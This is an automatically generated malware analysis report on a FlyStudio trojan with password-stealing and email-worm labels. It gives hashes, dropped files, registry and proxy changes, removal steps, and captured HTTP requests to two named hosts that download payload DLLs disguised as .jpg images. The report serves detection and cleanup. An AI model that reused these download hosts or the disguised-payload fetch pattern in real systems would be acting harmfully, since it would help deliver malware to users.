Trojan.Win32.FlyStudio_4761823229


by malwarelabrobot on August 25th, 2017 in Malware Descriptions.

Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, GenericInjector.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan, Worm, EmailWorm


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: 4761823229e1904d0e1ed24ca58e4145
SHA1: e47ce6137f6c2bc172af48a9deee43c85badecc4
SHA256: ed9cf01731b75a60ecd69de7d4018279d65d881032aa7e4462b9ed9d307e0da9
SSDeep: 24576:2cyu58Q5wrnZxodBmN2W2ImbXZ9ypsAAWvFa/:H58Qyr8pW21bXbytA4g/
Size: 945661 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2017-07-11 19:20:17
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour: EmailWorm
Description: Worm can send e-mails.


Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:2972

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:2972 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\dh[1].jb (606 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\goodiedll[1].jpg (313265 bytes)
C:\Users\"%CurrentUserName%"\Desktop\goodie\libuv.dll (200 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\goodie[1].jpg (41985 bytes)
C:\Users\"%CurrentUserName%"\Desktop\goodie\msvcr100.dll (773 bytes)
C:\Users\"%CurrentUserName%"\Desktop\goodie\MSVCP100.dll (421 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\MSVCP100[1].jpg (62505 bytes)
C:\Users\"%CurrentUserName%"\Desktop\goodie\TheWorld.exe (2 bytes)
C:\Users\"%CurrentUserName%"\Desktop\goodie\lua.dat (1 bytes)
C:\Users\"%CurrentUserName%"\Desktop\goodie\msvcp71.dll (503 bytes)
C:\Users\"%CurrentUserName%"\Desktop\goodie\libtcmalloc.dll (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\msvcr100[1].jpg (195745 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\goodiedll2[1].jpg (41681 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\atl100[1].jpg (28673 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\msvcp71[1].jpg (62361 bytes)
C:\Users\"%CurrentUserName%"\Desktop\goodie\ctfmon.exe (136 bytes)
C:\Users\"%CurrentUserName%"\Desktop\goodie\atl100.dll (138 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\lua[1].jpg (25 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\llq[1].jpg (460385 bytes)
C:\speedhack-i386.dll (181 bytes)

Registry activity

The process %original file name%.exe:2972 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\4761823229e1904d0e1ed24ca58e4145_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\4761823229e1904d0e1ed24ca58e4145_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\4761823229e1904d0e1ed24ca58e4145_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\4761823229e1904d0e1ed24ca58e4145_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\4761823229e1904d0e1ed24ca58e4145_RASAPI32]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\4761823229e1904d0e1ed24ca58e4145_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\4761823229e1904d0e1ed24ca58e4145_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\4761823229e1904d0e1ed24ca58e4145_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\4761823229e1904d0e1ed24ca58e4145_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\4761823229e1904d0e1ed24ca58e4145_RASMANCS]
"MaxFileSize" = "1048576"
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Multimedia\DrawDib]
"vga.drv 1276x846x32(BGR 0)" = "31,31,31,31"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

Dropped PE files

MD5 File path
bc83108b18756547013ed443b8cdb31b c:\Users\"%CurrentUserName%"\Desktop\goodie\MSVCP100.dll
1744ed2b5b02680ca7d04efb58a667cb c:\Users\"%CurrentUserName%"\Desktop\goodie\TheWorld.exe
c85670ab64068f8080998aeba6c5019c c:\Users\"%CurrentUserName%"\Desktop\goodie\atl100.dll
419485f745b1fe86a46ba23a3aeab8ab c:\Users\"%CurrentUserName%"\Desktop\goodie\ctfmon.exe
4dbee23a17014f781ba08c83d5ed2b60 c:\Users\"%CurrentUserName%"\Desktop\goodie\libtcmalloc.dll
2836816a275b5cae7e2712275fa8218c c:\Users\"%CurrentUserName%"\Desktop\goodie\libuv.dll
a94dc60a90efd7a35c36d971e3ee7470 c:\Users\"%CurrentUserName%"\Desktop\goodie\msvcp71.dll
0e37fbfa79d349d672456923ec5fbbe3 c:\Users\"%CurrentUserName%"\Desktop\goodie\msvcr100.dll
f581898b2ff51c2ccca11993b693c628 c:\speedhack-i386.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: ???????
Product Name: ??????
Product Version: 1.0.0.0
Legal Copyright: ????????

????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: ??????
Comments: ???????? ????
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
UPX0 4096 1536000 0 0 d41d8cd98f00b204e9800998ecf8427e
UPX1 1540096 831488 830976 5.49457 30069d5f173fa36bf88f54db28ec47d4
.rsrc 2371584 20480 16896 3.85082 440799c448ed5e73e3969b01b0fac369

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs



IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /dat/msvcp71.jpg HTTP/1.1
Referer: hXXp://dh-cfg.112zm.com/dat/msvcp71.jpg
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: dh-cfg.112zm.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: AliyunOSS
Date: Thu, 24 Aug 2017 10:08:07 GMT
Content-Type: application/x-www-form-urlencoded;charset=utf-8
Content-Length: 133400
Connection: keep-alive
x-oss-request-id: 599EA587355BE80F759E2057
Accept-Ranges: bytes
ETag: "4D0FEAE35C22BDA721499A12106674D4"
Last-Modified: Sun, 02 Oct 2016 03:53:51 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 7332987965176535418
x-oss-storage-class: Standard
Content-MD5: TQ/q41wivachSZoSEGZ01A==
x-oss-server-time: 1

<<< skipped >>>

GET /dat/MSVCP100.jpg HTTP/1.1

Referer: hXXp://dh-cfg.112zm.com/dat/MSVCP100.jpg
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: dh-cfg.112zm.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: AliyunOSS
Date: Thu, 24 Aug 2017 10:08:10 GMT
Content-Type: application/x-www-form-urlencoded;charset=utf-8
Content-Length: 135085
Connection: keep-alive
x-oss-request-id: 599EA58A355BE80F759E3264
Accept-Ranges: bytes
ETag: "0155139AD083B4D185688EEB444C92AD"
Last-Modified: Sun, 02 Oct 2016 06:53:06 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 2332238117699590557
x-oss-storage-class: Standard
Content-MD5: AVUTmtCDtNGFaI7rREySrQ==
x-oss-server-time: 1

<<< skipped >>>

GET /dat/msvcr100.jpg HTTP/1.1

Referer: hXXp://dh-cfg.112zm.com/dat/msvcr100.jpg
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: dh-cfg.112zm.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: AliyunOSS
Date: Thu, 24 Aug 2017 10:08:11 GMT
Content-Type: application/x-www-form-urlencoded;charset=utf-8
Content-Length: 413371
Connection: keep-alive
x-oss-request-id: 599EA58B355BE80F759E3FFA
Accept-Ranges: bytes
ETag: "3AB3D77C12DC2F5323C23BCA32785D98"
Last-Modified: Sun, 02 Oct 2016 06:53:14 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 12289816532371195820
x-oss-storage-class: Standard
Content-MD5: OrPXfBLcL1MjwjvKMnhdmA==
x-oss-server-time: 1

<<< skipped >>>

GET /dat/atl100.jpg HTTP/1.1

Referer: hXXp://dh-cfg.112zm.com/dat/atl100.jpg
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: dh-cfg.112zm.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: AliyunOSS
Date: Thu, 24 Aug 2017 10:08:16 GMT
Content-Type: application/x-www-form-urlencoded;charset=utf-8
Content-Length: 68910
Connection: keep-alive
x-oss-request-id: 599EA590355BE80F759E651A
Accept-Ranges: bytes
ETag: "810F1E656D733FE397B36894B919ADC8"
Last-Modified: Sun, 02 Oct 2016 06:53:19 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 1513477634852392430
x-oss-storage-class: Standard
Content-MD5: gQ8eZW1zP+OXs2iUuRmtyA==
x-oss-server-time: 1

<<< skipped >>>

GET /dat/goodie.jpg HTTP/1.1

Referer: hXXp://dh-cfg.112zm.com/dat/goodie.jpg
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: dh-cfg.112zm.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: AliyunOSS
Date: Thu, 24 Aug 2017 10:08:19 GMT
Content-Type: application/x-www-form-urlencoded;charset=utf-8
Content-Length: 90154
Connection: keep-alive
x-oss-request-id: 599EA593355BE80F759E77A2
Accept-Ranges: bytes
ETag: "EA6A184865540E95C80955AB8089C483"
Last-Modified: Sun, 02 Oct 2016 07:18:25 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 18096788365379136236
x-oss-storage-class: Standard
Content-MD5: 6moYSGVUDpXICVWrgInEgw==
x-oss-server-time: 1

<<< skipped >>>

GET /dat/goodiedll.jpg HTTP/1.1

Referer: hXXp://dh-cfg.112zm.com/dat/goodiedll.jpg
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: dh-cfg.112zm.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: AliyunOSS
Date: Thu, 24 Aug 2017 10:08:23 GMT
Content-Type: application/x-www-form-urlencoded;charset=utf-8
Content-Length: 657304
Connection: keep-alive
x-oss-request-id: 599EA597355BE80F759E9896
Accept-Ranges: bytes
ETag: "802F610E7191F8162A4EFB280373C16A"
Last-Modified: Thu, 24 Aug 2017 06:28:53 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 12372140137919244439
x-oss-storage-class: Standard
Content-MD5: gC9hDnGR+BYqTvsoA3PBag==
x-oss-server-time: 1

<<< skipped >>>

GET /dat/goodiedll2.jpg HTTP/1.1

Referer: hXXp://dh-cfg.112zm.com/dat/goodiedll2.jpg
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: dh-cfg.112zm.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: AliyunOSS
Date: Thu, 24 Aug 2017 10:08:30 GMT
Content-Type: application/x-www-form-urlencoded;charset=utf-8
Content-Length: 86887
Connection: keep-alive
x-oss-request-id: 599EA59E355BE80F759ECA26
Accept-Ranges: bytes
ETag: "EFA54AE54CCDA560CBED56B8C7A4FF0D"
Last-Modified: Thu, 24 Aug 2017 06:29:06 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 1785810222258754547
x-oss-storage-class: Standard
Content-MD5: 76VK5UzNpWDL7Va4x6T/DQ==
x-oss-server-time: 1

<<< skipped >>>

GET /dat/llq.jpg HTTP/1.1

Referer: hXXp://dh-cfg.112zm.com/dat/llq.jpg
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: dh-cfg.112zm.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: AliyunOSS
Date: Thu, 24 Aug 2017 10:08:31 GMT
Content-Type: image/jpeg
Content-Length: 961179
Connection: keep-alive
x-oss-request-id: 599EA59F355BE80F759ED4B8
Accept-Ranges: bytes
ETag: "DBA2D87BC76040E4988E469DD5F22069"
Last-Modified: Mon, 03 Jul 2017 13:36:34 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 10843003760265714573
x-oss-storage-class: Standard
Content-MD5: 26LYe8dgQOSYjkad1fIgaQ==
x-oss-server-time: 1

<<< skipped >>>

GET /dat/lua.jpg HTTP/1.1

Referer: hXXp://dh-cfg.112zm.com/dat/lua.jpg
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: dh-cfg.112zm.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: AliyunOSS
Date: Thu, 24 Aug 2017 10:08:42 GMT
Content-Type: application/x-www-form-urlencoded;charset=utf-8
Content-Length: 1532
Connection: keep-alive
x-oss-request-id: 599EA5AA355BE80F759F22B2
Accept-Ranges: bytes
ETag: "74678DA471C0C9612B7AE55348468762"
Last-Modified: Thu, 24 Aug 2017 06:25:31 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 10084772291103271800
x-oss-storage-class: Standard
Content-MD5: dGeNpHHAyWEreuVTSEaHYg==
x-oss-server-time: 1

<<< skipped >>>

GET /dh.jb HTTP/1.1
Referer: hXXp://dh-cfg.liuxue789.cn/dh.jb
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: dh-cfg.liuxue789.cn
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: AliyunOSS
Date: Thu, 24 Aug 2017 10:08:05 GMT
Content-Type: application/x-www-form-urlencoded;charset=utf-8
Content-Length: 606
Connection: keep-alive
x-oss-request-id: 599EA585D69B241A3F8993B4
Accept-Ranges: bytes
ETag: "5B2DE100C4A554422C328BE17689F6BD"
Last-Modified: Thu, 24 Aug 2017 06:29:40 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 10238493893129602065
x-oss-storage-class: Standard
Content-MD5: Wy3hAMSlVEIsMovhdon2vQ==
x-oss-server-time: 1

<<< skipped >>>

The Trojan connects to the servers at the following location(s):



Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager): No processes have been created.
  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\dh[1].jb (606 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\goodiedll[1].jpg (313265 bytes)
    C:\Users\"%CurrentUserName%"\Desktop\goodie\libuv.dll (200 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\goodie[1].jpg (41985 bytes)
    C:\Users\"%CurrentUserName%"\Desktop\goodie\msvcr100.dll (773 bytes)
    C:\Users\"%CurrentUserName%"\Desktop\goodie\MSVCP100.dll (421 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\MSVCP100[1].jpg (62505 bytes)
    C:\Users\"%CurrentUserName%"\Desktop\goodie\TheWorld.exe (2 bytes)
    C:\Users\"%CurrentUserName%"\Desktop\goodie\lua.dat (1 bytes)
    C:\Users\"%CurrentUserName%"\Desktop\goodie\msvcp71.dll (503 bytes)
    C:\Users\"%CurrentUserName%"\Desktop\goodie\libtcmalloc.dll (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\msvcr100[1].jpg (195745 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\goodiedll2[1].jpg (41681 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\atl100[1].jpg (28673 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\msvcp71[1].jpg (62361 bytes)
    C:\Users\"%CurrentUserName%"\Desktop\goodie\ctfmon.exe (136 bytes)
    C:\Users\"%CurrentUserName%"\Desktop\goodie\atl100.dll (138 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\lua[1].jpg (25 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\llq[1].jpg (460385 bytes)
    C:\speedhack-i386.dll (181 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
